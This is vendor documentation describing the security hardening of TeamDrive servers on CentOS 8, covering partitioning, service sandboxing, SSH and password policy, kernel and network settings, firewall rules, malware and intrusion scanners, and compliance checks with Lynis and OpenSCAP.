TeamDrive Server Hardening¶
The server hardening is based on the the CIS Benchmark for CentOS 8 version 2.0.0 which can be downloaded from the Center for Internet Security:
https://www.cisecurity.org/cis-benchmarks/
CentOS 8 Partition Layout¶
Partition Layout:
- root            42.0 GB
  |               11.0 GB
  |- dev           1.9 GB (tmpfs,noexec,nosuid,nodev)
  |  |- shm        2.0 GB (tmpfs,noexec,nosuid,nodev)
  |- run           2.0 GB (noexec,nosuid,nodev)
  |- sys
  |  |- fs
  |     |- cgroup  2.0 GB (tmpfs)
  |- usr           4.7 GB (nodev)
  |- boot          471 MB (noexec,nosuid,nodev)
  |- opt           950 MB (nosuid,nodev)
  |- proc                 (noexec,nosuid,nodev,hidepid=2*)
  |- home          471 MB (noexec,nosuid,nodev)
  |- tmp           950 MB (tmpfs,noexec,nosuid,nodev)
  |- var                  (noexec,nosuid,nodev)
  |  |- www        471 MB (noexec,nosuid,nodev)
  |  |- ossec      950 MB (nosuid,nodev)
  |  |- spool      471 MB (noexec,nosuid,nodev)
  |  |- tmp        950 MB (noexec,nosuid,nodev)
  |  |- log        4.7 GB (noexec,nosuid,nodev)
  |     |- audit   9.4 GB (noexec,nosuid,nodev)
  |- run                  (tmpfs,noexec,nosuid,nodev)
  |  |- user
  |     |- 0       393 MB (tmpfs)
  |- swap                 (encrypted)
(*) meaning all pids hidden for all users
Service Isolation and Sandboxing¶
The following services are sandboxed using a 01-sandboxing.conf addin to restrict access to file systems, networks, devices, kernel capabilities and system calls:
- aide: Advanced Intrusion Detection Environment
- auditd: Linux Auditing System (see /etc/audit/rules.d/ for audit rules)
- chkrootkit: Chkrootkit Security Scanner
- chronyd: Network Time Protocol (see /etc/chrony.conf for list of time servers)
- crond: Cronjob
- dbus: inter-process communication
- dnf-automatic-install: synchronizes package metadata
- dnscrypt-proxy: DNS proxy using encrypted DNS
- dnsmasq: DNS-Server
- fail2ban: Fail2ban scans log files and bans IPs that show the malicious signs like too many password failures, seeking for exploits, etc.
- firewalld: Firewall
- haveged: random number generator
- httpd: Apache webserver
- irqbalance: Linux daemon that distributes interrupts over among the processors and cores in your computer system
- mysqld: MySQL database server
- NetworkManager: Program for providing detection and configuration for systems to automatically connect to networks
- php-fpm: Execution of PHP scripts
- polkit: application-level toolkit for defining and handling the policy that allows unprivileged processes to speak to privileged processes
- postfix: mail transport agent
- rkhunter: rootkit scanner
- rsyslog: log processing
- s3d: TeamDrive S3-Daemon (only used on the hosting server)
- sshd: SSH Deamon
- systemd-logind: System service that manages user logins
- systemd-udevd: kernel events processing
- td-hostserver: TeamDrive Hosting Server background task (only used on the hosting server)
- td-regserver: TeamDrive Registration Server background task (only used on the registration server)
- td-webportal: TeamDrive Webportal Server background task (only used on the webportal server)
- tmp.mount: mounting temporary filesystem
- usbguard: USB device watcher
SSH Authentication, Login and Passwords¶
- SSL: Disabled TLS 0.9, SSL 3.0, TLS 1.0, TLS 1.1 (see /etc/crypto-policies/back-ends/gnutls.config) 
- Booloader: see /etc/default/grub 
- SSH Banner: see /etc/issue 
- SSH Login on port 2021 instead of 22: Several adjustments in /etc/ssh/sshd_config 
- Login parameters in /etc/login.defs: password expiry after 60 days (PASS_MAX_DAYS), set login retries to 5 (LOGIN_RETRIES) with lockouts for failed password attempts, default UMASK set to 022 (/etc/profile, /etc/init.d/functions, /etc/bashrc, /etc/csh.cshrc) 
- Password quality, length (min 18 characters, set in /etc/security/pwquality.conf), hashing algorithm, reuse prevention 
- OpenSSH Client and Server configured compliant to: - - DISA STIG for Red Hat Enterprise Linux 8 V1R7 - CIS Red Hat Enterprise Linux 8 Benchmark for Level 1 - Server - CIS Red Hat Enterprise Linux 8 Benchmark for Level 2 - Server - PCI-DSS v3.2.1 Control Baseline for Red Hat Enterprise Linux 8 - Protection Profile for General Purpose Operating Systems (Red Hat Enterprise Linux 8) - Australian Cyber Security Centre (ACSC) ISM Official (Red Hat Enterprise Linux 8) - Health Insurance Portability and Accountability Act (HIPAA) for Red Hat Enterprise Linux 8 
Kernel adjustments¶
- Kernel self-protection and exploit mitigation (settings l1tf=”full,force”, mds=”full,nosmt”, nosmt=”force”, spectre_v2=”on”, spectre_v2_user=”on”, spec_store_bypass_disable]=”on”, kvm.nx_huge_pages=”force”, tsx=”off”, tsx_async_abort=”full,nosmt”)
- Restricting access to kernel pointers in the proc filesystem by hiding kernel symbol addresses regardless of privileges
- Disabling of entire ptrace, core dumps (see /etc/sysctl.d/50-coredump.conf, /etc/systemd/coredump.conf) and debugging functionality including debugfs (setting slub_debug=FZ)
- Disabled kexec and kernel module loading
- ASLR with high entropy
- Protected symlinks, hardlinks, fifos and regular files to mitigate TOCTOU (Time-of-check to time-of-use) race conditions and data spoofing attacks
- Prevent use-after-free attacks through poisoning, sanity checks and red zoning of SLUB/SLAB objects
- Randomize kernel stack offset on syscall entry (setting randomize_kstack_offset=on)
- Disabled slab merging, which significantly increases the difficulty of heap exploitation by preventing overwriting objects from merged caches and by making it harder to influence slab cache layout (settings slab_nomerge=””, pti=”on”, vsyscall=”none”, debugfs=”off”, oops=”panic”)
- Mitigate use-after-free vulnerabilities and erase sensitive information in memory by zeroing of memory during allocation and free time (setting init_on_alloc=1, init_on_free=1)
- Randomization of page allocator freelists and the kernel stack offset on each syscal (setting page_alloc.shuffle=1)
- Kernel Page Table Isolation to mitigate Meltdown and prevention of KASLR bypasses
- Disabled vsyscalls to protect against ROP attacks
- Enabling kernel panic mode upon oops to prevent continued operation with compromised reliability
- CPU vulnerability mitigations
- Fully enabled hardening of JIT-compiled BPF to mitigate some types of JIT spraying attacks
Filesystem¶
- Adjusted mount options in /etc/fstab
- Encrypted swap device
- Disabled uncommon filesystems
Network¶
- Entire IPv6 stack disabled
- IPv4 stack hardening:
- Protection against SYN flood attacks
- Protection against time-wait assassination by dropping RST packets for sockets in the time-wait state
- Protection against IP spoofing through strict mode reverse path filtering
- Protection against Smurf attacks
- Prevent clock fingerprinting through ICMP timestamps
- Prevent man-in-the-middle attacks and minimise information disclosure by disabling ICMP redirect acceptance,sending and echo and also disabling source routing
- Prevent exploits by disabling TCP SACK
- Logging of martian packets
- TCP ISN CPU Information Leak Protection by using the tirdad kernel module
- Disabled uncommon network protocols and (obsolete) services and wireless networking
Firewall¶
- Using systemd sandboxed firewalld with nftables backend and “drop” as default zone
- Incoming traffic allowed for: 2021 (SSH), 80 (HTTP) 443 (HTTPS)
Shell¶
- Deinstalled unsed shells: tcsh, csh, ash, ksh, zsh, es, rc, esh, dash, screen
- Default shell: tmux with auto-logoff (see /etc/tmux.conf, /etc/profile.d/timeout.sh) (tmux hint: Copy & Paste using mouse by pressing shift-key)
Disabled services¶
Ensured that unused services are disabled:
- autofs
- avahi-daemon
- bind9
- bluetooth
- chargen-dgram
- chargen-stream
- chrony-wait
- cups
- cups-browsed
- daytime-dgram
- daytime-stream
- dhcpd
- discard-dgram
- discard-strea
- dovecot
- echo-dgram
- echo-stream
- hidd
- irqbalance
- isc-dhcp-server
- isc-dhcp-server6
- kdump
- lpd.service
- named
- nfs
- nfs-server
- nfslock
- nginx
- nis
- nmb
- ntalk
- ntpd
- ntpdate
- portmap
- proftp
- pure-ftpd
- rexec.socket.service
- rhnsd
- rlogin.socket.service
- rngd
- rpcbind.service
- rpcbind.socket
- rpcgssd
- rpcidmapd
- rpcsvcgssd
- rsh.socket.service
- rsyncd
- samba-ad-dc
- sendmail
- slapd
- smb
- snmpd
- sntp
- squid
- systemd-timesyncd
- tcpmux-server
- telnet.socket.service
- tftp.socket
- time-dgram
- time-stream
- vsftpd
- vsftpd
- xinetd
- ypserv
- systemd-coredump.service
- plymouth-halt.service
- plymouth-poweroff.service
- plymouth-quit-wait.service
- plymouth-reboot.service
- plymouth-switch-root.service
- plymouth-kexec.service
- plymouth-quit.service
- plymouth-read-write.service
- plymouth-start.service
Package Management and Automatic (Security) Updates¶
- Enabled gpg check for all repositories and for local packages
- Using dnf-automatic and needrestart for update notification/installation and restart of services, see /etc/dnf/automatic.conf
Virus check¶
ClamAV for Linux (see https://www.clamav.net) is installed on the server. The ClamAV service needs 1 GB RAM and will use 1 full CPU core during the scan process. See /etc/clamd.d/scan.conf for scan configuration and parameters.
Signature databases from ClamAV and additional 3rd party signature databases via clamav-unofficial-sigs https://github.com/extremeshok/clamav-unofficial-sigs
Rootkit Scanner¶
Two rootkit scanner are installed chkrootkit with daily scan interval:
and rkhunter with daily scan interval including the forensic unhide module to detect hidden processes and TCP/UDP ports:
RNG and Entropy¶
- RDRAND distrusted by the kernel as an entropy source
- Using systemd sandboxed haveged (HAVEGE algorithm) as random number generator daemon for high entropy https://github.com/jirka-h/haveged
Fail2Ban¶
Fail2ban (see https://www.fail2ban.org) scans log files (e.g. /var/log/apache/error_log) and bans IPs that show the malicious signs – too many password failures, seeking for exploits, etc. Generally Fail2Ban is then used to update firewall rules to reject the IP addresses for a specified amount of time, although any arbitrary other action (e.g. sending an email) could also be configured. Out of the box Fail2Ban comes with filters for various services (apache, courier, ssh, etc).
Whitelist your own IPs in: /etc/fail2ban/jail.local
Fail2ban is activated for Apache, PHP, postfix and SSH with these jails: apache-auth, apache-badbots, apache-noscript, apache-overflows, apache-shellshock, php-url-fopen
To check currently banned IPs:
fail2ban-client banned
fapolicyd¶
Setting and enforcing a policy that either allows or denies application execution based on a rule set efficiently prevents the execution of unknown and potentially malicious software.
Software installed using dnf will be automatically whitelisted.
In case of installing own scripts, you have to whiteliste them, see:
https://access.redhat.com/documentation/de-de/red_hat_enterprise_linux/8/html/security_hardening/assembly_blocking-and-allowing-applications-using-fapolicyd_security-hardening#marking-files-as-trusted-using-an-additional-source-of-trust_assembly_blocking-and-allowing-applications-using-fapolicyd
Intrusion Detection (IDS/File Integrity)¶
Daily AIDE scan and check https://aide.github.io/
The fapolicyd software framework controls the execution of applications based on a user-defined policy. This is one of the most efficient ways to prevent running untrusted and possibly malicious applications on the system (“restrictive” policy rule set defined in /etc/fapolicyd/rules.d/*).
More informations:
DNSCrypt¶
DNSCrypt with DNSSEC using systemd sandboxed dnscrypt-proxy and dnsmasq as local DNS caching server.
DNSCrypt is a protocol that authenticates communications between a DNS client and a DNS resolver. It prevents DNS spoofing. It uses cryptographic signatures to verify that responses originate from the chosen DNS resolver and haven’t been tampered with.
Related conf-Files:
- /etc/NetworkManager/NetworkManager.conf --> dns=none
- /etc/resolv.conf --> nameserver 127.0.0.1
- /etc/systemd/resolved.conf --> DNSStubListener=no
- /etc/dnscrypt-proxy/dnscrypt-proxy.toml
The DNSCrypt will load and use a DNS server from this list:
https://dnscrypt.info/public-servers
In case you have to use your own DNS server, remove the immutable flag from:
chattr -i /etc/resolv.conf
and change the nameserver in /etc/resolv.conf to your own value.
NTP¶
Secure NTP with NTS (Network Time Security, RFC 8915) via systemd sandboxed chronyd
Accounting and Auditing¶
Using comprehensive auditing rules compliant to:
- DISA STIG for Red Hat Enterprise Linux 8 V1R7
- CIS Red Hat Enterprise Linux 8 Benchmark for Level 2 - Server
- PCI-DSS v3.2.1 Control Baseline for Red Hat Enterprise Linux 8
- Protection Profile for General Purpose Operating Systems (Red Hat Enterprise Linux 8)
- Australian Cyber Security Centre (ACSC) ISM Official (Red Hat Enterprise Linux 8)
- Health Insurance Portability and Accountability Act (HIPAA) for Red Hat Enterprise Linux 8
PHP (only Registration Server)¶
- Using OWASP recommended security configuration
- Using systemd sandboxed FastCGI Process Manager (FPM)
CentOS Hardening Check¶
To check the hardening score, use the Lynis - Security auditing tool and ossec benchmark. Start both checks with:
/root/hardening/benchmark.sh
Lynis generates a test result after 5 minutes analyzing the system with a green, yellow and red status and calculates a hardening index which should be 97 of 100.
After the Lynis check, the OpenSCAP scanner will be started directly:
The OpenSCAP scanner executes the following 8 CIS checks which takes about 25 minutes in total (an overview and further descriptions of the test can be found here https://www.mankier.com/8/scap-security-guide):
- CIS Red Hat Enterprise Linux 8 Benchmark for Level 1 - Server
- CIS Red Hat Enterprise Linux 8 Benchmark for Level 2 - Server
- PCI-DSS v3.2.1 Control Baseline for Red Hat Enterprise Linux 8
- ANSSI-BP-028 (enhanced)
- Health Insurance Portability and Accountability Act (HIPAA)
- Australian Cyber Security Centre (ACSC) ISM Official
- Protection Profile for General Purpose Operating Systems
- DISA STIG for Red Hat Enterprise Linux 8
Each check will generate a html result file located in:
/root/hardening/
Known problems caused by the hardening¶
An dnf update might fail in case of updating the “setup”-package. To fix the problem:
chattr -i /etc/shells
dnf update
chattr +i /etc/shells
If dnf update fails with “glibc-devel-2.28-225.el8.i686 has inferior architecture” use:
dnf update --allowerasing